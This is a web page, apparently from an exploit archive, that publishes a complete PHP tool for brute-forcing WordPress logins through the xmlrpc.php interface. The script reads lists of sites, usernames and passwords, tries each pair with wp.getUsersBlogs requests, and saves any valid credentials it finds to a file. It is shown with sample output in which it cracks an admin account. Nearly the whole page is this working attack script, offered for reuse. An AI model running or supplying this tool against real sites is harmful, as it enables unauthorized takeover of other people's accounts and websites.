facebook facebook twitter rss

Wordpress Brute via Xmlrpc interface

Author: n4sss , Published: 12-08-2014
<?php
/*
* Wordpress brute force via XMLRPC iface
*
* ---------------------
* V1.0:
* This version is a simple example of how to brute a wordpress
* via xmlrpc interface.
* Construct the xmlrpc object with: Xmlrpc(Site list, User list, Wordlist) and launch the init method:
*
* $xml = new Xmlrpc('sites.txt', 'usernames.txt', 'wordlist.txt');
* $xml->init();
*
*
*
* rodrigo ~/repositorios/XmlRpcBrute (master) $ php wpXmlrpc.php
*
* __ __ _ _ _
* \ \ / / | | | | | |
* \ V / _ __ ___ | |_ __ _ __ ___ | |__ _ __ _ _| |_ ___
* > < | '_ ` _ \| | '__| '_ \ / __| | '_ \| '__| | | | __/ _ \
* / . \| | | | | | | | | |_) | (__ | |_) | | | |_| | || __/
* /_/ \_\_| |_| |_|_|_| | .__/ \___| |_.__/|_| \__,_|\__\___|
* | |
* |_|
* Site list: sites.txt
* User list: users.txt
* Wordlist: wordlist.txt
* Welcome to wp brute force via Xmlrpc iface.
* Checking if xmlrpc is available...
* [OK][http://exploit/wordpress/xmlrpc.php] Bruting via xmlrpc
* [-] http://exploit/wordpress/xmlrpc.php admin:123
* [-] http://exploit/wordpress/xmlrpc.php admin:1234
* [-] http://exploit/wordpress/xmlrpc.php admin:12345
* [-] http://exploit/wordpress/xmlrpc.php admin:123456
* [-] http://exploit/wordpress/xmlrpc.php admin:1234567
* [-] http://exploit/wordpress/xmlrpc.php admin:12345678
* [+][Valid Crendential] http://exploit/wordpress/xmlrpc.php admin:admin
*
*
* Valid credentials: valid_wp.txt
* Re-use the class :D
* ---------------------
*
* ---------------------
* Next (V2.0):
* Implements pthreads
* Users enumerate method
* ---------------------
*
* By Rodrigo "n4sss" <n-l4b@hotmail.com> Twt: @n4sss
* Greetx: xstpl_, MMxM -> perl l33t :3
*/

set_time_limit(0);
error_reporting(E_ALL);


Class Xmlrpc{

var $httpResponse;
var $httpinfo;
var $log;
var $userAgent;
var $usrs;
var $wordlist;
var $uris;
var $match;
var $header;
var $xml;
var $timeout;


/**
* Construct class
*
* @param string $uris Uris to test
* @param string $usrs Usernames
* @param string $wordlist Pass list
*/
function __construct($uris, $usrs, $wordlist){
$this->uris = $uris;
$this->usrs = $usrs;
$this->wordlist = $wordlist;
$this->log = 'valid_wp.txt';
$this->match = '<name>isAdmin</name>';
$this->userAgent = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0';
$this->headers = array('Content-Type: application/x-www-form-urlencoded');
$this->timeout = 10;
}

function __destruct(){
// Launch extra part to the final if you want
echo "\n\nThanks for use. (:\n",
"By n4sss < @n4sss >\n";
}

/**
* Gem a valid xml to given usr & pw
*
* @param string $usr
* @param string $pw
* @return string Xml with usr and pw
*/
function gemXml($usr, $pw){
$this->xml = "
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value><string>$usr</string></value></param>
<param><value><string>$pw</string></value></param>
</params></methodCall>
";
return $this->xml;
}

/**
* Check xmlrpc status
*
* @param string $uri
* @return boolean
*/
function is_200($uri){
ob_start();
$ch = curl_init($uri);
curl_setopt($ch, CURLOPT_URL, $uri);
$this->httpResponse = curl_exec($ch);
$this->httpinfo = curl_getinfo($ch);
ob_end_clean();
if($this->httpinfo['http_code'] == 200) return true;
return false;
}

/**
* Test usrs into xmlrpc iface
*
* @param string $list
* @return void
*/
function bruteXml(){
foreach($this->uris as $site):
if(strstr($site, 'https')) exit('[-] Https env , exiting!');
if(!strstr($site, 'http')) $site = 'http://' . $site;
if(!strstr($site, 'xmlrpc.php')) $site = $site.'/xmlrpc.php';
echo "Checking if xmlrpc is available...\n";
if(!$this->is_200($site)) exit("Xmlrpc iface not available friend! Bye!\n"); // Check if xmlrpc is on
echo "[OK][{$site}] Bruting via xmlrpc\n";
foreach($this->usrs as $usr):
foreach($this->wordlist as $pw):
$this->gemXml($usr, $pw); // Init the xml body
$ch = curl_init($site);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $this->userAgent);
curl_setopt($ch, CURLOPT_HTTPHEADER, $this->headers);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $this->xml);
curl_setopt($ch, CURLOPT_TIMEOUT, $this->timeout);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->timeout);
curl_setopt($ch, CURLOPT_ENCODING, '');
$this->httpResponse = curl_exec($ch);
curl_close($ch);
if(strstr($this->httpResponse, $this->match)){ $msg = sprintf("[+][Valid Crendential] %s %s:%s\n", $site, $usr, $pw); echo $msg; file_put_contents($this->log, $msg, FILE_APPEND); exit;}
echo sprintf("[-] %s %s:%s\n", $site, $usr, $pw);
endforeach;
endforeach;
endforeach;
}

/**
* init array and bruteFunction
*
* @return void
*/
function init(){
echo "Welcome to wp brute force via Xmlrpc iface.\n";
$this->uris = array_filter(explode("\n", file_get_contents($this->uris)));
$this->usrs = array_filter(explode("\n", file_get_contents($this->usrs)));
$this->wordlist = array_filter(explode("\n", file_get_contents($this->wordlist)));
$this->bruteXml();
}
}

// ~$ php wp_xmlrpc.php
echo "
__ __ _ _ _
\ \ / / | | | | | |
\ V / _ __ ___ | |_ __ _ __ ___ | |__ _ __ _ _| |_ ___
> < | '_ ` _ \| | '__| '_ \ / __| | '_ \| '__| | | | __/ _ \
/ . \| | | | | | | | | |_) | (__ | |_) | | | |_| | || __/
/_/ \_\_| |_| |_|_|_| | .__/ \___| |_.__/|_| \__,_|\__\___|
| |
|_| ",
"\nSite list: ";
$site_list = trim(fgets(STDIN));
echo "User list: ";
$user_list = trim(fgets(STDIN));
echo "Wordlist: ";
$wordlist = trim(fgets(STDIN));
foreach(array($site_list, $user_list, $wordlist) as $file){if(!file_exists($file)) exit("File {$file} not found!\n");};
$xml = new Xmlrpc($site_list, $user_list, $wordlist);
$xml->init();

Like us on Facebook :